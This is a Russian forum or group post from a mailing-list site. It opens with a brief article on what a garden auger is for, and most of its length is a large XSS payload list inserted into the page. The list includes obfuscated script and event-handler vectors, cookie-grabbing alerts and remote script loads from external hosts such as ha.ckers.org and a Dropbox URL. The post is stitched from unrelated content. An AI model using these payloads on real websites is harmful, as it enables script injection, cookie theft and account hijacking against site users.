Отправляет email-рассылки с помощью сервиса Sendsay
Открытая группа
851 участник
Администратор Svetlana7027

Последние откомментированные темы:

20250124062241

←  Предыдущая тема Все темы Следующая тема →
bettar***@y*****.ru пишет:

Для чего нужен садовый бур? [!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List --] [!-- Author : Ismail Tasdelen --] [!-- Linkedin : https:/

Бур садовый применяется для формирования лунок. Прекрасно подходит для посадки деревьев, кустов и иногда рассады. С его помощью можно легко и просто сделать небольшую ямку для высаживания тех или иных растений. Чаще всего устройства подобного рода применяются для создания ям глубиной до одного метра. Также его применяют для внесения удобрений и полива огорода.

 

Бур – незаменимый в эксплуатации инструмент, как для профессиональных садоводов, так и для бытовых целей. Сегодняшний рынок предлагает нам большой выбор изделий подобного рода. Вы можете приобрести бур садовый ручной или подобрать электрическую модель. По своей сути, оба варианта замечательно справляются со своей задачей. Разница лишь в эффективности, которая и влияет на окончательный выбор.

 

Статья: моя ссылка

 

 

 

 

 

<script\x20type="text/javascript">javascript:alert(1); <script\x3Etype="text/javascript">javascript:alert(1); <script\x0Dtype="text/javascript">javascript:alert(1); <script\x09type="text/javascript">javascript:alert(1); <script\x0Ctype="text/javascript">javascript:alert(1); <script\x2Ftype="text/javascript">javascript:alert(1); <script\x0Atype="text/javascript">javascript:alert(1); '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) </svg onResize> </body onMouseEnter></body onFocus> </frameset onScroll> </html onMouseUp>

</body onPropertyChange> </svg onLoad></body onPageHide></body onMouseOver></body onUnload></body onLoad> </bgsound onPropertyChange></html onMouseLeave></html onMouseWheel>

</body onPageShow></frameset onFocus> </applet onError> </marquee onStart> </html onMouseOver></html onMouseEnter></body onBeforeUnload></html onMouseDown> </marquee onScroll> </xml onPropertyChange> </frameset onBlur>

</applet onReadyStateChange> </svg onUnload></html onMouseOut></body onMouseMove></body onResize> </body onPopState></html onMouseMove> </applet onreadystatechange></body onpagehide> </svg onunload> </applet onerror></body onkeyup></body onunload> </body onload></html onmouseover> </body onbeforeunload></body onfocus></body onkeydown> </svg onload></html onmousemove></body onblur> \x3Cscript>javascript:alert(1) '"`> javascript:alert(1)</script\x0A javascript:alert(1) --> --> --> --> --> `"'> test "'`>

 

test test test test test test test test test test test test test test"'`>ABC DEF "'`>ABC DEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script\x20type="text/javascript">javascript:alert(1); <script\x3Etype="text/javascript">javascript:alert(1); <script\x0Dtype="text/javascript">javascript:alert(1); <script\x09type="text/javascript">javascript:alert(1); <script\x0Ctype="text/javascript">javascript:alert(1); <script\x2Ftype="text/javascript">javascript:alert(1); <script\x0Atype="text/javascript">javascript:alert(1); ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1) <script\x20>javascript:alert(1) <script\x0D>javascript:alert(1) <script\x0A>javascript:alert(1) <script\x0C>javascript:alert(1) <script\x00>javascript:alert(1) <script\x09>javascript:alert(1) `"'> `"'> `"'> `"'> `"'> `"'> `"'> alert(1)0 document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML; <x '="foo"> x <? foo=">javascript:alert(1)"> <! foo=">javascript:alert(1)"> </ foo=">javascript:alert(1)"> <? foo=">"> <! foo="[[[Inception]]"> <% foo> d.innerHTML=d.innerHTML <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> XXX javascript:alert(1)"` `> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1) <!-- [if<img src=x onerror=javascript:alert(1)//]> --> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object></div></image></x></b></object> <object width="300" height="150" classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="postdomevents" /></object> <a style="-o-link: 'javascript:javascript:alert(1)'; -o-link-source: current;">X@import "data:,*%7bx:expression(javascript:alert(1))%7D"; </a><a style="position: absolute;">XXX</a><a>XXX</a><a style="-o-link: 'javascript:javascript:alert(1)'; -o-link-source: current;">X</a> <div style="font-family: 'foo;color:red;';">XXX <div style="font-family: foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <div style="content: url('/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(svg')s);"> </div> <div style="list-style: url('http://foo.f') );">X <div id="d"> <div style="font-family: 'sans'; color:red;';">X</div> </div> <div style="background: url(/f#oo/;">X <div style="font-family: foo{bar; background: url(http://foo.f/oo};">X <div id="x">XXX</div> XXX &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>¼script¾javascript:alert(1)¼/script¾ X 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behA:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> 1 <a>XXX</a> <label></label> <div id="x">x</div> <a><img /> <img /> <img /> < <img src="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(scriptlet)s" /> <img /> <img /> <br /> </a> <ul> <li>XSS<iframe width="300" height="150"></iframe> <div style="background-image: );"> <div style="background-image: );"> <div><img /></div> </div> </div> <div style="background-image: );"> <div style="background-image: );"> <div><!-- [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--></div> </div> </div> <div style="background-image: );"> <div style="background-image: );"> <div><object data="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(scriptlet)s" type="text/x-scriptlet" width="300" height="150"></object> <object width="300" height="150" classid="clsid:ae24fdae-03c6-11d1-8b76-0080c744f389"><param name="url" value="javascript:javascript:alert(1)" /></object></div> </div> </div> <button form="test"></button><button form="test">X</button><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><input type="text" autofocus="" /> <p> </p> <p>&&<script&&>javascript:alert(1)&&;&&<&&/script&&></p> <p><!--?xml version="1.0"?-->javascript:alert(1); <embed width="300" height="150"></embed> <embed width="300" height="150"></embed> <embed src="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(jscript)s" width="300" height="150"></embed> <object width="300" height="150"> <embed type="image" src="%(scriptlet)s" /> <xml id="I"><x><c><![CDATA[<img />]]</c><x></x></x></xml> <img /> <a>test1</a> <a>test1</a> <embed width="500" height="500" code="data:text/html,<script>%(payload)s</script>" /> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>alert(String.fromCharCode(88,83,83)) '';!--"<xss>=&{()} <img /> <img /> <img /> <img /> <img says="" xss="" /> xxs link xxs link <IMG """>alert("XSS")"> <img /> <img src="onmouseover="alert('xxs')"" /> <img /> <img /> <img /> <img /> <img /> <img /> <img /> perl -e 'print "<img src="java\0script:alert(\"XSS\")" />";' > out <img /> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"> <SCRIPT/SRC="http://ha.ckers.org/xss.js"> <alert("XSS");//< <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// '"--> <? echo('<SCR)';echo('IPT>alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"> PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt %00>alert(1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`%00` onerror=alert(1) <script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ "><h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> <img/ src=`~` onerror=prompt(1)> <form><iframe src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[]" onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style>/**/alert(document.location)/**/ <form> /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X alert(0%0) <style/onload=<!-- > alert (1)> <///style///>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X" /> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a><button> DIV <a>X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf" /> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over <a>Click Here</a> <%<!--'%><script>alert(1);</script --> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value="<" /><iframe/src=javascript:confirm(1) X http://www.alert(1) </script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script +-+-1-+-+alert(1) <body/onload=<!--> (1)> /*<script* */alert(1)// confirm(1); alert(1) ClickMe alert(1) style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)> x "> CLICKME click Click Me ‘; alert(1); ‘)alert(1);// <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt %00>alert(1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`%00` onerror=alert(1) <script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ "><h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> <img/ src=`~` onerror=prompt(1)> <form><iframe src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[]" onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style>/**/alert(document.location)/**/ <form> /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X alert(0%0) <style/onload=<!-- > alert (1)> <///style///>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X" /> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a><button> DIV <a>X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf" /> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over <a>Click Here</a> <%<!--'%><script>alert(1);</script --> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value="<" /><iframe/src=javascript:confirm(1) X http://www.alert(1) </script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script +-+-1-+-+alert(1) <body/onload=<!--> (1)> /*<script* */alert(1)// confirm(1); alert(1) ClickMe alert(1) style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)> x "> CLICKME click Click Me ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’> ”> < %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie) foo <script>

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"> PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search hellox worldss





...



lol <![>"> <! foo=">"> </ foo=">"> <? foo=">"> <! foo="[[[Inception]]"> <% foo> LOL LOL LOL <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC=\"mocha:[code]\"> <IMG SRC=\"livescript:[code]\"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert('XSS')\"> <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"width: expression(alert('XSS'));\"> <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"> <XSS STYLE=\"xss:expression(alert('XSS'))\"> exp/*<A STYLE='no\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF=\"javascript:alert('XSS');//\"> <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED> <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED> a=\"get\"; b=\"URL(\\"\"; c=\"javascript:\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML> <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> <XML SRC=\"xsstest.xml\" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"> </BODY></HTML> <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT> <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"--> <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <A HREF=\"http://66.102.7.147/\">XSS</A> <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> <A HREF=\"http://1113982867/\">XSS</A> <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A> <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> <A HREF=\"//www.google.com/\">XSS</A> <A HREF=\"//google\">XSS</A> <A HREF=\"http://ha.ckers.org@google\">XSS</A> <A HREF=\"http://google:ha.ckers.org\">XSS</A> <A HREF=\"http://google.com/\">XSS</A> <A HREF=\"http://www.google.com./\">XSS</A> <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A> <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A> < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\"javascript:alert('XSS')\" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\"XSS\");//<</SCRIPT> <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")> <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <IMG SRC=\" javascript:alert('XSS');\"> perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=\"javascript:alert('XSS');\"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--\"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} <IMG """>"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"> <SCRIPT/SRC="http://ha.ckers.org/xss.js"> < \";alert('XSS');// ¼script¾alert(¢XSS¢)¼/script¾
exp/* a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); TESTHTML5FORMACTIONcrosssitespt <? foo=">alert(1)"> <! foo=">alert(1)"> </ foo=">alert(1)"> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')() {alert(1)};1 crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use') alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “><s”%2b”cript>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) ">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101)) ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{()} 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" <script/src=data:,alert()> <marquee/onstart=alert()> 